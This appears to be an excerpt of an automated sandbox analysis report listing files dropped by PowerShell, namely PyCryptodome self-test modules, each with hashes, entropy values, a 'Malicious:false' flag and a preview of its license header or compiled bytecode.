                                                                                                                                                                                                              MD5:650B195DB914D00543FFC6282AEF4386
                                                                                                                                                                                                              SHA1:C12250DA69C867BF14B63D2B991A21D062C88241
                                                                                                                                                                                                              SHA-256:468CD14E0B72874B146C15413D0AA19B9D1CECE91D74924F5B746142CE14EE41
                                                                                                                                                                                                              SHA-512:4168A13930D6011BECBE65B9862B4146C65D8F3CE38CEEB6CC3AA57E332B8D08D2463FA3ABE285CF77AF706D75810FBD255D9FBDE3D57BC222A377F5C00C90D3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Random/__init__.py: Self-test for random number generation modules..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):923
                                                                                                                                                                                                              Entropy (8bit):5.177684507082521
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:PlA/nS7XnnIbbtnFXOx2x+gHebq/l8rzJoymh43:Pg4XnnIZhOx2x+L+YJoN43
                                                                                                                                                                                                              MD5:E76CB0472E7003316CC6CC4D6AA700BA
                                                                                                                                                                                                              SHA1:35D813DBAC6A0F1F3E42465A973225581D90AEAD
                                                                                                                                                                                                              SHA-256:B93EF0B074D3C6E33C55239231430A5B595AA76224563C0D4F5D54EB73820FE9
                                                                                                                                                                                                              SHA-512:0E34C4EFA9AB5AEFC48D8DD44EFADA3A1F2BEEB01BA8B5B410305BAA49EF06DD5076986AA5E138F7E5899E7C1C15DA9CEEE203A801C01C1ABF945F79DFAEB1F3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e-.........................V.....d.Z.d.Z.i.f.d...Z.e.d.k(..r.d.d.l.Z.d...Z...e.j...................d.............y.y.).z&Self-test for random number generatorsz.$Id$c.....................@.....g.}.d.d.l.m.}...|.|.j...................|...........z...}.|.S.).N.....)...test_random)...config)...Crypto.SelfTest.Randomr......get_tests).r......testsr....s.... .sC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/Random/__init__.pyr....r........s'.........E..2.E.[.EZ.EZ.bh.EZ.Ei.<i.E....L.......__main__r....Nc.....................<.....t.........j...................t.........................S.).N)...unittest..TestSuiter......r....r......<lambda>r....$...s.......H..&..&.y.{..3..r......suite)...defaultTest)...__doc__..__revision__r......__name__r....r......mainr....r....r......<module>r........s<.........2..-...................z........3.E....H.M.M.g..&.....r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8443
                                                                                                                                                                                                              Entropy (8bit):4.628328972989623
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:BeSHeU7/FKPX5O94q2db58xBe8Y5rZlLKItXrX+SNkLeiYYxqpKQUaM82nE:5HeU7/mKiVtrXN7X0cpKnBvE
                                                                                                                                                                                                              MD5:EA24C43F0C181AFB6B8D0E569CA40510
                                                                                                                                                                                                              SHA1:1C449F9882A7C46767BF7B1A540A2FC8105C383C
                                                                                                                                                                                                              SHA-256:A43638AF1FD0233982BFAC288D4F54B1BC67B0B4A2F156047F8AE29993F0C500
                                                                                                                                                                                                              SHA-512:2B2E8EC29D98CC5A450726A3BEA7D893C2D4132FD233B832981C214B8B8150F074E9F9EE913F9D2D9FF4A213089DDB7C11E32B7490A76779CA5864FFF51D2748
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j...................d.............y.y.).z'Self-test suite for Crypto.Random.new().....N)...bc...........................e.Z.d.Z.d...Z.y.)...SimpleTestc..........................d.d.l.m.}...|.j...........................}.|.j...................d.........}.|.j...................d.........}.|.j...................|.|...........|.j...................d.........}.|.j...................|.|...........|.j...................|.|...........d.d.l.m.}...|.j...................d.........}.|.j...................d.........}.|.j...................|.|...........|.|.kD..r.|.}.|.}.n.|.}.|.}.t.........d.d.........D.]...}.|.j...................|.|.|.........}.|.j...................|.|.|.........}.|.j...................|.|...........|.j...................|.|.c.x.k...x.r...|.k...n.c...d...........|.j...................|.|.c.x.k...x.r...|.k...n.c...d...........|.j...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7157
                                                                                                                                                                                                              Entropy (8bit):4.828342299384293
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:nwdQHvwJya+isH+rAx7iX4DRyckzfYLyWENIX1dZ:nUewJya+isMAx7ioDRyLbiREWX9
                                                                                                                                                                                                              MD5:BC110BB6E2A2F78799CBA2E4A078B348
                                                                                                                                                                                                              SHA1:5EA96E99799846814665A161C23E80946B11EBD3
                                                                                                                                                                                                              SHA-256:8A94FE4391E4615B8FB5F4115830BD8ADDABB05CEF1E8F74F7BB9AE5F8E367F7
                                                                                                                                                                                                              SHA-512:96C5E94B3304520F626F031269CBB4BB6EB81DC57E00020865B0FBDEDBF0EBD8F3C21FF51B2BC2B737192FCA0A7E3922AC88F1D6473A4061C14D5B22DCF96D2C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Util/test_generic.py: Self-test for the Crypto.Random.new() function..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1599
                                                                                                                                                                                                              Entropy (8bit):5.165215017196936
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:lc+J2w8yXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/Flw8ZB6uadPOy4:NpEIB0jcQHMsvI/S3oCFOOBzwQOaT
                                                                                                                                                                                                              MD5:083FC5F35EE0DF1EC53ECAC2C412FC84
                                                                                                                                                                                                              SHA1:354D57E8536552067A110B7BAB4DF8EE920528B1
                                                                                                                                                                                                              SHA-256:EE9D77A0F03E91170605EE5BBC1FDD351030504B68840E5D1AC87C688B2BDAED
                                                                                                                                                                                                              SHA-512:F03AC26A5574C2BC8F22A6FB6AAB894E1B757F58B95DF2391DC336CFBE7AB3BEFB0DAA8A8CB12135D0B42C3C225EBDC0F2BA98586F1F73744150372E6D77C9D8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Signature/__init__.py: Self-test for signature modules..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWA
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1163
                                                                                                                                                                                                              Entropy (8bit):4.927032315640665
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:hfV7w845qoBMoIoaoXAc2xXyGbld8rzGmknliTn:hdsBh2xdxYC0n
                                                                                                                                                                                                              MD5:B714D43526D372CAA2C2DBD1E7D63B67
                                                                                                                                                                                                              SHA1:98918CD0220FF0A5725D260DD4DA30E79F0EE970
                                                                                                                                                                                                              SHA-256:CDB6587C217B72E6E522012FE952A1707574BAEC0D65A7287CC3926420F89DE6
                                                                                                                                                                                                              SHA-512:77D9F65922EB7ABC58AB19EA1868200AFDD03001DA08EFCF21F8FADD367B989885C67D0F769566C689E96075034FC8617267973BE0E35BB44C98C295B54B3E41
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e?.........................j.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...i.f.d...Z.e.d.k(..r.d...Z...e.j...................d.............y.y.).z.Self-test for signature modules.....N.....)...test_pkcs1_15..test_pss..test_dss..test_eddsac...........................g.}.|.t.........j...................|...........z...}.|.t.........j...................|...........z...}.|.t.........j...................|...........z...}.|.t.........j...................|...........z...}.|.S.).N)...config).r......get_testsr....r....r....).r......testss.... .vC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/SelfTest/Signature/__init__.pyr....r........s`.........E....]..$..$.F..3..3.E....X.......v.......E....X.......v.......E....Z..!..!....0..0.E....L.......__main__c.....................<.....t.........j...................t.........................S.).N)...unittest..TestSuiter......r....r......suiter....'...s...........!..!.).+......r....r....)...defaultTest)...__do
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):61022
                                                                                                                                                                                                              Entropy (8bit):5.607955650016875
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:v8UPpOxF7A54PHsYA+vQvqqzxqRZQQRvvL:REmi
                                                                                                                                                                                                              MD5:F9BF05D7B3DFD7ACFB5609DD9F6F323C
                                                                                                                                                                                                              SHA1:F5ECFEC3FF0FFCC8AC8B963DED0342EB4D55CB7A
                                                                                                                                                                                                              SHA-256:B0072DA4B7C725C800B9A357D43274F036E6FCFB3E7ADCBD02B6514880827451
                                                                                                                                                                                                              SHA-512:2BBADDBB882D9C3875A970A8611549BFF4E0B16487A80B0C814196DC0919A0A61E0275E7450E5F32B6E95D708E781FB161D2A9D7A6E5F9B50658146917B39E31
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e[...............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d...Z d...Z!d...Z"..G.d...d.........Z#..G.d...d.e.jH..........................Z%..G.d...d.e.jH..........................Z&..e.d.d.d.d.d...i.........x.s...g.Z'..e(e'........D...]J..\...Z)Z*..e+e*e,........rA..e.jZ..................d.e*........Z.e.s.J...e.j_..................d.........ja..................d.d.........Z1..e"e1........Z2.Q..e3e*d.........r%e*jh..................Z5e*jl..................Z7e*jp..................Z9..e2ju..................e*jv..........................Z<e*jz..................e7e5e9f.D...c.g.c.]...}...e.|...............c.}.Z>..e.j~..................e>d.........Z@..e.jt..................e@d.........ZAeAe<e*j...................e*j...................z...f.d...ZDeAe<e*j...................e*j...................z...f.d ..ZEe*j...................d.k(..r...eGe&d!
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):23066
                                                                                                                                                                                                              Entropy (8bit):5.351079640118478
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Bx9inXOqfflTJZGuVEcojnGJi7tEMoCOERaHrZRyCch97adv7fZnIb:z9iXOqfdrTVVsG8mhlmCcSlGb
                                                                                                                                                                                                              MD5:A25918CF74B4088A3720D6DA1C838449
                                                                                                                                                                                                              SHA1:0A64F506C2DD9C69D3838B817A86C6D8CF54E9E1
                                                                                                                                                                                                              SHA-256:717E7B0D6FB3C9AD8495492FFBB4F41697C4BF6293C760DBC42DC186F9F21A81
                                                                                                                                                                                                              SHA-512:942DE911BCEB6F5EA841CEEC3AE7DAF2DCCD080BAF77E4E5AE3C51A9B8D4009954AE8A22E4ECF592AE8A1A939251FD5B9CC3251589F54EB79E9DF993D00DFE31
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e.`........................n.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.d.d.d.d.d.d.d.d.d.e.d.d.f.d.d.d.d.d.d.d.d.d.d.d d.e.d.d!f.d.d d.e.d"d#f.f.Z.g.Z.e.D.]2..Z.e.j'..................e.D...c.g.c.]...}...e.|.e.........r...e.|.........n.|.......c.}............4....G.d$..d%e.j,..........................Z...G.d&..d'e.j,..........................Z...G.d(..d)e.j,..........................Z...G.d*..d+e.j,..........................Z...G.d,..d-e.j,..........................Z...G.d...d/e.j,..........................Z.i.f.d0..Z.e.d1k(..r.d2..Z...e.j@..................d3.4..........y.y.c...c.}.w.)5.....N....unhexlify)...ECC)...eddsa)...SHA512..SHAKE256)...list_test_cases)...load_test_vectors_wycheproof)...bytes_to_long)..@9d61b19deffd5a60ba844af492ec2cc44449c5697b326919703bac031cae7f60.@d75a980182b10ab7d54bfed3c964073a0ee172f3daa62325af021a68f707511a..Nr.....e5564300c360ac729086e2cc806e828a84877f1eb8e5d974d873e065224901555fb
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):18093
                                                                                                                                                                                                              Entropy (8bit):5.299489970723213
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:KQrHLOFcEPnwBb9qU6lJ7rKxULHoQ9i+pIDvnh87UrPrWcPkqqqH695Pm/giWU:VHScowBb9qUfxULIwCvh8s+fqa9l9U
                                                                                                                                                                                                              MD5:117C726288771C32B6AE9A0A4AE1A314
                                                                                                                                                                                                              SHA1:CE4D5E04F4F6ED328F9742602B1500FDDECBC0A9
                                                                                                                                                                                                              SHA-256:72BF971364ADE9B433298C6B8D2E89635EB2E32D95134455A1D144B18519C288
                                                                                                                                                                                                              SHA-512:CC575F946B196850813604E8F5ECBFF61B69EA234A0AB0544C6BEDCD038A86CBDEC8F3F6653F295FA67C4FBF50DBF7171BB786101A3399E16647AAC45BB8A164
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.eA6.............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z ..G.d...d.e.jB..........................Z"..G.d...d.e.jB..........................Z#..e.d.d.d.d...d...d...d...........x.s...g.Z$..e%e$........D.]...\...Z&Z'..e(e'e)........r.....e*e'd.........r.e'jV..................Z,.&..e e'jZ..................j]..................................Z/e/ja..................e'jb..........................Z2..e.jf..................e,e'jh..................f.D...c.g.c.]...}...e.|...............c.}.........Z5..e.j`..................e5........Z6e2e6e'jn..................f.d...Z8e2e6e'jn..................f.d...Z9e'jt..................d.k(..r...e;e#d.e&z...e9..............e;e#d.e&z...e8................G.d...d e.jB..........................Z<..G.d!..d"e.jB..........................Z=..e.d.d#d$d%d&..i.........x.s...g.Z>e>..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21873
                                                                                                                                                                                                              Entropy (8bit):5.387886644316981
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:vegpWbKUYBl7oVuYcAq7Gv1ANPvZ2tnmr5WAX37:vjgAl7oVpcAq7Gv1ANHZQ8Wu7
                                                                                                                                                                                                              MD5:1F4615A626DC2D44139555D18D0DD240
                                                                                                                                                                                                              SHA1:B87EFDA6CEE159D0C6E2D84DC223F4206D09BEC8
                                                                                                                                                                                                              SHA-256:FCAAAB1552C228B2D7CC3A369D3F60B07F07260DD8F8243864C8417D365E44AA
                                                                                                                                                                                                              SHA-512:CDB108DB18B91CA60A5FDDFBB7B66247630E68E574DC0918CD14B8CBC11ACC80436D9C36611C0F1645B55A507800699722C7E838B95BCF3B2385154E0DF052AE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e<?..............................d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.........Z...G.d...d.e.j:..........................Z...G.d...d.e.j:..........................Z...G.d...d.e.j:..........................Z ..e.d.d.d.d...d...d...........x.s...g.Z!..e"e!........D...]K..\...Z#Z$..e%e$e&........r.....e'e$d.........r.e$jP..................Z).'..e'e$d.........r..1..e.e$jT..................jW..................................Z,e,j[..................e$j\..........................Z/..e.j`..................e)e$jb..................f.D...c.g.c.]...}...e.|...............c.}.........Z2e$jf....................e.d.........k7..r8..e.e$jf..........................Z4..e.jZ..................e2..e5e$jf..........................e4..........Z6n...e.jZ..................e2d...........Z6e/e6e$jn..................f.d ..Z8e/e6e$jn..................f.d!..Z9e$jt............
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):58459
                                                                                                                                                                                                              Entropy (8bit):5.033274153315109
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:1r6q7FYGlGFjUYy2ItfrukaJx5jsZ/iNj+rYEZRlAjfbc:1rpjj2ySkaRjtNKrYO3
                                                                                                                                                                                                              MD5:DB184380CEA1F11904E6D14175913500
                                                                                                                                                                                                              SHA1:59480F2DBD08D734AC553B4D37CB6743DB5204E6
                                                                                                                                                                                                              SHA-256:D4C77C4DE539C4759000188159D73E22EED3997DC31D9244A6AAD476437D95BD
                                                                                                                                                                                                              SHA-512:2ADED52FF8E77B12FFDCA180072C7D3B73087C4BEF145A4167D12D8026AD32851EB6763627BE31D8F61361B51DB07654146CDD56B30AA611CF07C4DF89037ECA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# SelfTest/Signature/test_dss.py: Self-test for DSS signatures..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24708
                                                                                                                                                                                                              Entropy (8bit):4.928631305766138
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:6rskrs9VqV5QJGc/S6WOYs06PDk2Q6tE1yGWEFUtce47VIUbB:6r6q7qG+WO26TzGoVG7VNB
                                                                                                                                                                                                              MD5:885594421BDB74CB41BD212B07F2FE31
                                                                                                                                                                                                              SHA1:07853D9DF97033A47A5CA0290A7D23AD67DB6E62
                                                                                                                                                                                                              SHA-256:C9FF4BA5715303422A5E828AC80B8868C893255BD832C428F2DD369A169CA8FD
                                                                                                                                                                                                              SHA-512:12662D64C764654AE7066C87D632050D53507FF39778FEE3F6D5F4C6805EEDDC6C3267978FFD91E210887AF874C418C57D17756B983D73D47D132F4DD7E6D639
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# Copyright (c) 2022, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,..# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUEN
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13889
                                                                                                                                                                                                              Entropy (8bit):5.0841198388491415
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/IWGRc3Wgxxu1ndXxjTVXHYjBTetB4H/UObo5FrrQyEReRBRj6Dcr:0rskrs9Vqw2xxu1nvvZKcwjNW
                                                                                                                                                                                                              MD5:093398DDA0E59A51C5BF120896ECAF48
                                                                                                                                                                                                              SHA1:7BB7CBCEEAC65543DE8C869443335448261DFCF8
                                                                                                                                                                                                              SHA-256:30EF738E57068C05379B9E12B435A777B3FC0010935DE6BEFD01FA4C8C0C33E8
                                                                                                                                                                                                              SHA-512:59AB1A3CC7C0176991B062FFEA818A61D7D670DAF1C6CBC9C37CCD914785C53B7FC17A90D605306E55C744B59E8A5F7D643AB1935F23B86F317F1DD823FBFBAC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):16188
                                                                                                                                                                                                              Entropy (8bit):5.334015326079158
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/ISmR/wgOLydIVOHScWJ8WuIWBExWaUYbIeDcYcOEtZ0RB2BZuOYc:0rskrs9Vq4/kbVUSdxpzcY6V5
                                                                                                                                                                                                              MD5:C3413892395D1B95715A94D5B15594F7
                                                                                                                                                                                                              SHA1:8D5566324873EB5BD0DF6DA4F43F4D23B443FDB0
                                                                                                                                                                                                              SHA-256:42CBEB606342C984B33629AA0C2D0FE9659A9518C8BB502E9AB7E23063DBE8FA
                                                                                                                                                                                                              SHA-512:5CC41F7ABDE76236C6CB3314DF824AC8947693A0273924D715771859CE0760A37553BC6554FE8B0B85DBA6F25516B024696E2DFBADFDDD0BB745F3DE855F45B6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2043
                                                                                                                                                                                                              Entropy (8bit):5.237240672014205
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:NkwEIB0jcQHMsvI/S3oCFl40lSifxGEgO9JJraZa:CwfFQHvojCv9JJrB
                                                                                                                                                                                                              MD5:EC15E489C4F3AF1D1987C5EA4FA2F3BC
                                                                                                                                                                                                              SHA1:02FC0FA5EC2BD850A5149C4ED28598A667D41E32
                                                                                                                                                                                                              SHA-256:83AE64E7E2A6D6A1E0CC643404157AD938D8A84EA9A7442F4210E10E9D5FD69E
                                                                                                                                                                                                              SHA-512:8989312A6F7A87A4D78D325C5836A9541A980477797E3C0133DCB1A2E66D2646FAADDBEAA7232BE44208A01031EB9EEF4DBA5F3A1E64D637C5D5A15957158EBC
                                                                                                                                                                                                              Malicious:false
